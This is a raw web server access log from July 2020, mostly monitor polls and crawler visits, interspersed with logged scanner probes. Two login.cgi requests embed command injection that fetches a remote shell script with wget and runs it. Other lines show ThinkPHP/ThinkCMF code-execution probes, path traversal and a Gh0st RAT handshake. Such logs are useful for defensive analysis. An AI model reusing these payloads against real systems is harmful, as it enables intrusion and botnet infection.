111.229.246.160 - - [05/Jul/2020:07:50:08 +0200] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
111.229.246.160 - - [05/Jul/2020:07:50:09 +0200] "GET /html/public/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
111.229.246.160 - - [05/Jul/2020:07:50:09 +0200] "GET /public/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
111.229.246.160 - - [05/Jul/2020:07:50:10 +0200] "GET /TP/html/public/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
111.229.246.160 - - [05/Jul/2020:07:50:12 +0200] "GET /elrekt.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
111.229.246.160 - - [05/Jul/2020:07:50:12 +0200] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
111.229.246.160 - - [05/Jul/2020:07:50:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
212.91.246.72 - - [05/Jul/2020:07:50:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:51:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:52:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:53:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.140 - - [05/Jul/2020:07:53:49 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.83:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:07:54:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:55:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:56:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.224.130 - - [05/Jul/2020:07:57:03 +0200] "GET ../../proc/ HTTP" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:07:57:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:58:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:07:59:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.244.66.250 - - [05/Jul/2020:07:59:35 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
212.91.246.72 - - [05/Jul/2020:08:00:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:01:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.140 - - [05/Jul/2020:08:02:15 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.86:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:08:02:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:03:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.244.66.250 - - [05/Jul/2020:08:03:23 +0200] "GET /seiten/intern/login3.php HTTP/1.1" 404 341 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)"
85.25.177.219 - - [05/Jul/2020:08:04:07 +0200] "GET /robots.txt HTTP/1.1" 404 330 "-" "Mozilla/5.0 (compatible; adscanner/)/1.0 (http://seocompany.store; spider@seocompany.store)"
85.25.177.219 - - [05/Jul/2020:08:04:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; adscanner/)/1.0 (http://seocompany.store; spider@seocompany.store)"
212.91.246.72 - - [05/Jul/2020:08:04:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:05:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:06:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.11.20.34 - - [05/Jul/2020:08:06:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:08:07:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:08:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:09:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.224.117 - - [05/Jul/2020:08:10:07 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.83:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:08:10:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.135.99.210 - - [05/Jul/2020:08:10:49 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
179.189.97.133 - - [05/Jul/2020:08:10:56 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:08:11:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.1.99.139 - - [05/Jul/2020:08:11:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:08:12:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:13:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:14:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.30 - - [05/Jul/2020:08:14:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
43.230.99.233 - - [05/Jul/2020:08:15:05 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:08:15:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:16:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:17:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:18:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:19:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:20:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
86.106.156.226 - - [05/Jul/2020:08:20:37 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:08:21:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:22:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.57.73.237 - - [05/Jul/2020:08:22:38 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:08:23:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:24:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.70.140 - - [05/Jul/2020:08:25:06 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.89:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:08:25:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:26:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:27:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
210.186.154.100 - - [05/Jul/2020:08:27:59 +0200] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 325 "-" "XTC"
212.91.246.72 - - [05/Jul/2020:08:28:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:29:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:30:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:31:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
37.211.63.10 - - [05/Jul/2020:08:31:35 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
212.91.246.72 - - [05/Jul/2020:08:32:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.30 - - [05/Jul/2020:08:32:54 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
83.97.20.21 - - [05/Jul/2020:08:33:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [05/Jul/2020:08:33:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:34:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:35:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:36:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:37:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:38:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.31 - - [05/Jul/2020:08:38:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [05/Jul/2020:08:39:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:40:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
115.77.230.164 - - [05/Jul/2020:08:40:29 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:08:41:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:42:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.29 - - [05/Jul/2020:08:42:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
194.180.224.117 - - [05/Jul/2020:08:42:24 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.86:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
83.97.20.31 - - [05/Jul/2020:08:42:59 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [05/Jul/2020:08:43:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:44:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:45:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.135.19.211 - - [05/Jul/2020:08:45:23 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:08:46:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.77.201.75 - - [05/Jul/2020:08:46:41 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
95.38.50.97 - - [05/Jul/2020:08:47:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:08:47:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:48:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:49:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:50:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:51:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:52:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:53:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:08:54:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
111.92.106.46 - - [05/Jul/2020:08:54:48 +0200] "GET /admin/login.asp HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:08:55:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.64.62.199 - - [05/Jul/2020:08:56:12 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
195.54.160.135 - - [05/Jul/2020:08:56:21 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:08:56:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [05/Jul/2020:08:57:04 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:08:57:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [05/Jul/2020:08:57:34 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [05/Jul/2020:08:57:44 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [05/Jul/2020:08:57:50 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [05/Jul/2020:08:58:18 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:08:58:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
83.97.20.30 - - [05/Jul/2020:08:58:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
195.54.160.135 - - [05/Jul/2020:08:58:34 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [05/Jul/2020:08:59:02 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [05/Jul/2020:08:59:08 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [05/Jul/2020:08:59:20 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:08:59:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [05/Jul/2020:09:00:04 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.54.160.135 - - [05/Jul/2020:09:00:11 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:09:00:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.185.125.72 - - [05/Jul/2020:09:01:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:09:01:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.102.44.104 - - [05/Jul/2020:09:01:48 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.37.101/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [05/Jul/2020:09:02:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.224.117 - - [05/Jul/2020:09:03:18 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.89:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:09:03:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.205.34 - - [05/Jul/2020:09:03:24 +0200] "Gh0st\xad" 501 321 "-" "-"
93.55.192.43 - - [05/Jul/2020:09:03:41 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:09:04:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:05:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.105.97.132 - - [05/Jul/2020:09:06:22 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:09:06:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
211.23.18.32 - - [05/Jul/2020:09:06:35 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
218.161.28.27 - - [05/Jul/2020:09:06:45 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:09:07:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.45.49.177 - - [05/Jul/2020:09:07:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:09:08:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:09:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.224.117 - - [05/Jul/2020:09:10:02 +0200] "GET / HTTP/1.1" 200 1229 "http://212.91.246.81:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
212.91.246.72 - - [05/Jul/2020:09:10:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:11:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.88.9.135 - - [05/Jul/2020:09:11:41 +0200] "GET /robots.txt HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.9.135 - - [05/Jul/2020:09:11:45 +0200] "GET /img/hsh.jpg HTTP/1.1" 404 321 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
113.172.29.7 - - [05/Jul/2020:09:11:53 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [05/Jul/2020:09:12:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Jul/2020:09:13:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [05/Jul/2020:09:13:29 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [05/Jul/2020:09:14:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.177.109.118 - - [05/Jul/2020:09:15:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [05/Jul/2020:09:15:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.54.160.135 - - [05/Jul/2020:09:15:37 +0200] "POST /api/jsonws/invoke HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
